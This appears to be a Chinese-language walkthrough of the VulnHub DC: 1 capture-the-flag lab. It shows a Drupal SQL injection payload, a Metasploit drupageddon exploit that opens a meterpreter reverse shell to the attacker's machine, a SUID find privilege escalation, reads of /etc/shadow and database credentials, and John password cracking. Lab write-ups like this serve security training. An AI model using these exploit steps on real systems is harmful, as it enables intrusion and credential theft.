[vulnhub]DC: 1

https://www.vulnhub.com/entry/dc-1,292/

主机发现端口扫描

使用nmap扫描网段类存活主机

因为靶机是我最后添加的，所以靶机IP是156

nmap -sP 192.168.75.0/24     
//            
Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-28 12:48 CST
Nmap scan report for 192.168.75.1
Host is up (0.00012s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.75.2
Host is up (0.00012s latency).
MAC Address: 00:50:56:FB:CA:45 (VMware)
Nmap scan report for 192.168.75.156
Host is up (0.00088s latency).
MAC Address: 00:0C:29:47:FC:83 (VMware)
Nmap scan report for 192.168.75.254
Host is up (0.00042s latency).
MAC Address: 00:50:56:FB:E7:F4 (VMware)
Nmap scan report for 192.168.75.151
Host is up.

扫描主机开放端口

nmap -sT -min-rate 10000 -p- 192.168.75.156
//
Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-28 12:48 CST
Nmap scan report for 192.168.75.156
Host is up (0.00010s latency).
Not shown: 65531 closed tcp ports (conn-refused)
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
111/tcp   open  rpcbind
39179/tcp open  unknown
MAC Address: 00:0C:29:47:FC:83 (VMware)

扫描主机服务版本以及系统版本

nmap -sT -sV -O -p22,80,111,39179 192.168.75.156
//
Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-28 12:49 CST
Nmap scan report for 192.168.75.156
Host is up (0.00054s latency).PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
80/tcp    open  http    Apache httpd 2.2.22 ((Debian))
111/tcp   open  rpcbind 2-4 (RPC #100000)
39179/tcp open  status  1 (RPC #100024)
MAC Address: 00:0C:29:47:FC:83 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.16
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

扫描漏洞

nmap -script=vuln -p22,80,111,39179 192.168.75.156
Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-28 12:54 CST
Nmap scan report for 192.168.75.156
Host is up (0.00053s latency).PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.75.156
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.75.156:80/
|     Form id: user-login-form
|     Form action: /node?destination=node
|     
|     Path: http://192.168.75.156:80/user/password
|     Form id: user-pass
|     Form action: /user/password
|     
|     Path: http://192.168.75.156:80/node?destination=node
|     Form id: user-login-form
|     Form action: /node?destination=node
|     
|     Path: http://192.168.75.156:80/user/register
|     Form id: user-register-form
|     Form action: /user/register
|     
|     Path: http://192.168.75.156:80/user
|     Form id: user-login
|     Form action: /user
|     
|     Path: http://192.168.75.156:80/user/
|     Form id: user-login
|_    Form action: /user/
| http-vuln-cve2014-3704: 
|   VULNERABLE:
|   Drupal - pre Auth SQL Injection Vulnerability
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2014-3704
|         The expandArguments function in the database abstraction API in
|         Drupal core 7.x before 7.32 does not properly construct prepared
|         statements, which allows remote attackers to conduct SQL injection
|         attacks via an array containing crafted keys.
|           
|     Disclosure date: 2014-10-15
|     References:
|       http://www.securityfocus.com/bid/70595
|       https://www.sektioneins.de/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3704
|_      https://www.drupal.org/SA-CORE-2014-005
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum: 
|   /rss.xml: RSS or Atom feed
|   /robots.txt: Robots file
|   /UPGRADE.txt: Drupal file
|   /INSTALL.txt: Drupal file
|   /INSTALL.mysql.txt: Drupal file
|   /INSTALL.pgsql.txt: Drupal file
|   /: Drupal version 7 
|   /README: Interesting, a readme.
|   /README.txt: Interesting, a readme.
|   /0/: Potentially interesting folder
|_  /user/: Potentially interesting folder
|_http-dombased-xss: Couldn't find any DOM based XSS.
111/tcp   open  rpcbind
39179/tcp open  unknown
MAC Address: 00:0C:29:47:FC:83 (VMware)

疑似sql注入和CSRF，以及一些让人感兴趣的目录

web渗透

主页面有三个链接，login new account req new password

访问让人感兴趣的目录

robots.txt 列出了很多的目录

User-agent: *
Crawl-delay: 10
# Directories
Disallow: /includes/
Disallow: /misc/
Disallow: /modules/
Disallow: /profiles/
Disallow: /scripts/
Disallow: /themes/
# Files
Disallow: /CHANGELOG.txt
Disallow: /cron.php
Disallow: /INSTALL.mysql.txt
Disallow: /INSTALL.pgsql.txt
Disallow: /INSTALL.sqlite.txt
Disallow: /install.php
Disallow: /INSTALL.txt
Disallow: /LICENSE.txt
Disallow: /MAINTAINERS.txt
Disallow: /update.php
Disallow: /UPGRADE.txt
Disallow: /xmlrpc.php
# Paths (clean URLs)
Disallow: /admin/
Disallow: /comment/reply/
Disallow: /filter/tips/
Disallow: /node/add/
Disallow: /search/
Disallow: /user/register/
Disallow: /user/password/
Disallow: /user/login/
Disallow: /user/logout/
# Paths (no clean URLs)
Disallow: /?q=admin/
Disallow: /?q=comment/reply/
Disallow: /?q=filter/tips/
Disallow: /?q=node/add/
Disallow: /?q=search/
Disallow: /?q=user/password/
Disallow: /?q=user/register/
Disallow: /?q=user/login/
Disallow: /?q=user/logout/

已知CMS是Drupal 7 PHP 5.4.45 Apache 2.2.22

Drupal 版本可以在install.php 找到，打开F12可以找到 Drupal 7 (http://drupal.org)

晚上查阅漏洞

CVE-2014-3704 Drupal SQL注入漏洞，SQL注入，尝试爆出数据

直接放在bp的重放器使用

POST /?q=node&destination=node HTTP/1.1
Host: 192.168.75.156
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 126pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0,concat(0xa,database()),0)%23]=bob&name[0]=a

用户: dbuser@localhost
当前库： drupaldb
版本： mysql 5.5.60-0+deb7u1

尝试了联合语句好像太长了，无法使用漏洞，我们丢给sqlmap尝试

drupaldb没查到任何数据

使用MSF搜索漏洞

msf6 > search DrupalMatching Modules
================#  Name                                           Disclosure Date  Rank       Check  Description-  ----                                           ---------------  ----       -----  -----------0  exploit/unix/webapp/drupal_coder_exec          2016-07-13       excellent  Yes    Drupal CODER Module Remote Command Execution1  exploit/unix/webapp/drupal_drupalgeddon2       2018-03-28       excellent  Yes    Drupal Drupalgeddon 2 Forms API Property Injection2  exploit/multi/http/drupal_drupageddon          2014-10-15       excellent  No     Drupal HTTP Parameter Key/Value SQL Injection3  auxiliary/gather/drupal_openid_xxe             2012-10-17       normal     Yes    Drupal OpenID External Entity Injection4  exploit/unix/webapp/drupal_restws_exec         2016-07-13       excellent  Yes    Drupal RESTWS Module Remote PHP Code Execution5  exploit/unix/webapp/drupal_restws_unserialize  2019-02-20       normal     Yes    Drupal RESTful Web Services unserialize() RCE6  auxiliary/scanner/http/drupal_views_user_enum  2010-07-02       normal     Yes    Drupal Views Module Users Enumeration7  exploit/unix/webapp/php_xmlrpc_eval            2005-06-29       excellent  Yes    PHP XML-RPC Arbitrary Code Execution

使用第三个，Drupal HTTP Parameter Key/Value SQL Injection

msf6 > use exploit/multi/http/drupal_drupageddon 
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(multi/http/drupal_drupageddon) > show options
msf6 exploit(multi/http/drupal_drupageddon) > set rhosts 192.168.75.156
msf6 exploit(multi/http/drupal_drupageddon) > exploit
[*] Started reverse TCP handler on 192.168.75.151:4444 
[*] Sending stage (39927 bytes) to 192.168.75.156
[*] Meterpreter session 1 opened (192.168.75.151:4444 -> 192.168.75.156:43212) at 2024-09-28 14:32:44 +0800meterpreter >

拿到shell

提权

查看权限

www-data@DC-1:/var/www$ whoami
www-data
//
www-data@DC-1:/var/www$ uname -a
Linux DC-1 3.2.0-6-486 #1 Debian 3.2.102-1 i686 GNU/Linux
//
www-data@DC-1:/var/www$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
//
www-data@DC-1:/var/www$ sudo -l
bash: sudo: command not found
//
www-data@DC-1:/var/www$ find / -perm -u=s -type f 2>/dev/null
/bin/mount
/bin/ping
/bin/su
/bin/ping6
/bin/umount
/usr/bin/at
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/find
/usr/sbin/exim4
/usr/lib/pt_chown
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/sbin/mount.nfs

当前目录下存在flag1.txt

Every good CMS needs a config file - and so do you.

因为我们查找/var/www$ find / -perm -u=s -type f 2>/dev/null 的时候发现了find 有suid权限，所以可以直接提权

www-data@DC-1:/var/www$ find flag1.txt -exec 'whoami' \;
root

www-data@DC-1:/var/www$ find flag1.txt -exec '/bin/sh' \;
find flag1.txt -exec '/bin/sh' \;
# whoami
whoami

读取/root下的thefinalflag.txt

Well done!!!!Hopefully you've enjoyed this and learned some new skills.You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7

flag

flag1,在获得shell的时候当前目录下

flag2

尝试寻找Drupal的数据库配置文件 Sites/default/settings.php ，flag2 就在里面

# cat /var/www/sites/default/settings.php
//
<?php/**** flag2* Brute force and dictionary attacks aren't the* only ways to gain access (and you WILL need access).* What can you do with these credentials?**/$databases = array ('default' => array ('default' => array ('database' => 'drupaldb','username' => 'dbuser','password' => 'R0ck3t','host' => 'localhost','port' => '','driver' => 'mysql','prefix' => '',),),
);

flag3

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| drupaldb           |
+--------------------+
//
mysql> show tables;
+-----------------------------+
| Tables_in_drupaldb          |
+-----------------------------+
| actions                     |
| authmap                     |
| batch                       |
| block                       |
| block_custom                |
| block_node_type             |
| block_role                  |
| blocked_ips                 |
| cache                       |
| cache_block                 |
| cache_bootstrap             |
| cache_field                 |
| cache_filter                |
| cache_form                  |
| cache_image                 |
| cache_menu                  |
| cache_page                  |
| cache_path                  |
| cache_update                |
| cache_views                 |
| cache_views_data            |
| comment                     |
| ctools_css_cache            |
| ctools_object_cache         |
| date_format_locale          |
| date_format_type            |
| date_formats                |
| field_config                |
| field_config_instance       |
| field_data_body             |
| field_data_comment_body     |
| field_data_field_image      |
| field_data_field_tags       |
| field_revision_body         |
| field_revision_comment_body |
| field_revision_field_image  |
| field_revision_field_tags   |
| file_managed                |
| file_usage                  |
| filter                      |
| filter_format               |
| flood                       |
| history                     |
| image_effects               |
| image_styles                |
| menu_custom                 |
| menu_links                  |
| menu_router                 |
| node                        |
| node_access                 |
| node_comment_statistics     |
| node_revision               |
| node_type                   |
| queue                       |
| rdf_mapping                 |
| registry                    |
| registry_file               |
| role                        |
| role_permission             |
| search_dataset              |
| search_index                |
| search_node_links           |
| search_total                |
| semaphore                   |
| sequences                   |
| sessions                    |
| shortcut_set                |
| shortcut_set_users          |
| system                      |
| taxonomy_index              |
| taxonomy_term_data          |
| taxonomy_term_hierarchy     |
| taxonomy_vocabulary         |
| url_alias                   |
| users                       |
| users_roles                 |
| variable                    |
| views_display               |
| views_view                  |
| watchdog                    |
+-----------------------------+
//
mysql> select * from users;
+-----+--------+---------------------------------------------------------+------------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+------------------------+------+
| uid | name   | pass                                                    | mail                   | theme | signature | signature_format | created    | access     | login      | status | timezone            | language | picture | init                   | data |
+-----+--------+---------------------------------------------------------+------------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+------------------------+------+
|   0 |        |                                                         |                        |       |           | NULL             |          0 |          0 |          0 |      0 | NULL                |          |       0 |                        | NULL |
|   1 | admin  | $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR | admin@example.com      |       |           | NULL             | 1550581826 | 1550583852 | 1550582362 |      1 | Australia/Melbourne |          |       0 | admin@example.com      | b:0; |
|   2 | Fred   | $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg | fred@example.org       |       |           | filtered_html    | 1550581952 | 1550582225 | 1550582225 |      1 | Australia/Melbourne |          |       0 | fred@example.org       | b:0; |
+-----+--------+---------------------------------------------------------+------------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+------------------------+------+

尝试使用john破解admin的密码，53cr3t

john --wordlist=/usr/share/wordlists/rockyou.txt pass 
//
Using default input encoding: UTF-8
Loaded 1 password hash (Drupal7, $S$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 32768 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
53cr3t           (?)     
1g 0:00:22:32 DONE (2024-09-28 16:03) 0.000739g/s 1657p/s 1657c/s 1657C/s 53cr3t5..539831
Use the "--show" option to display all of the cracked passwords reliably

还有一种方法：网上查阅在网站目录的 scripts目录里面有个用于生成密码的password-hash.php文件

// 生成 ilovesunset 的密码hash
php password-hash.php 'ilovesunset' > 1.txt

然后数据库里将密码覆盖上去即可

拿到密码53cr3t后，登录

在这里插入图片描述

点击find content ,存在flag3 ，内容是

flag3 
Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.

flag4

根据提示，flag4应该在/etc/shadows

# cat /etc/shadow
//
root:$6$rhe3rFqk$NwHzwJ4H7abOFOM67.Avwl3j8c05rDVPqTIvWg8k3yWe99pivz/96.K7IqPlbBCmzpokVmn13ZhVyQGrQ4phd/:17955:0:99999:7:::
daemon:*:17946:0:99999:7:::
bin:*:17946:0:99999:7:::
sys:*:17946:0:99999:7:::
sync:*:17946:0:99999:7:::
games:*:17946:0:99999:7:::
man:*:17946:0:99999:7:::
lp:*:17946:0:99999:7:::
mail:*:17946:0:99999:7:::
news:*:17946:0:99999:7:::
uucp:*:17946:0:99999:7:::
proxy:*:17946:0:99999:7:::
www-data:*:17946:0:99999:7:::
backup:*:17946:0:99999:7:::
list:*:17946:0:99999:7:::
irc:*:17946:0:99999:7:::
gnats:*:17946:0:99999:7:::
nobody:*:17946:0:99999:7:::
libuuid:!:17946:0:99999:7:::
Debian-exim:!:17946:0:99999:7:::
statd:*:17946:0:99999:7:::
messagebus:*:17946:0:99999:7:::
sshd:*:17946:0:99999:7:::
mysql:!:17946:0:99999:7:::
flag4:$6$Nk47pS8q$vTXHYXBFqOoZERNGFThbnZfi5LN0ucGZe05VMtMuIFyqYzY/eVbPNMZ7lpfRVc0BYrQ0brAhJoEzoEWCKxVW80:17946:0:99999:7:::

将flag4那行保存为flag4再使用john破解，的到密码orange

john --wordlist=/usr/share/wordlists/rockyou.txt flag4                                                                                             
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
orange           (flag4)     
1g 0:00:00:00 DONE (2024-09-28 16:23) 12.50g/s 12800p/s 12800c/s 12800C/s 123456..bethany
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

使用ssh登录

然后读取加目录下的flag4.txt

Can you use this same method to find or access the flag in root?Probably. But perhaps it's not that easy.  Or maybe it is?

[vulnhub]DC: 1

主机发现端口扫描

web渗透

提权

flag

相关文章

无人机目标检测与语义分割数据集（猫脸码客第238期）

Vue组件间通信的9种实现方式

jmeter脚本-请求体设置变量and请求体太长的处理

SQL，力扣题目1549，每件商品的最新订单【窗口函数】

函数指针和指针函数的区别

【网络】HTTP（超文本传输协议）详解

卸载 Adobe Genuine Software Client

点云从入门到精通技术详解100篇-基于结构光测量的三维人脸重建及识别

京东云雅典娜刷机步骤（需要拆机）

电子商城购物平台的设计与开发+ssm(lw+演示+源码+运行）

基于 Spring Boot 和 Vue 的门票销售创新系统

【Python】Python自习课：第一个python程序

docker-compose安装rabbitmq 并开启延迟队列和管理面板插件（rabbitmq_delayed_message_exchange）

103 - Lecture 2 Table and Data Part 1

Linux云计算个人学习总结（二）

PropTypes 和 TypeScript 在 React 中的比较

CommunityToolkit.Mvvm如何使用

【自动化利器】12个评估大语言模型（LLM）质量的自动化框架

mybatis源码解析-sql执行流程

儿童安全座椅行业全面深入分析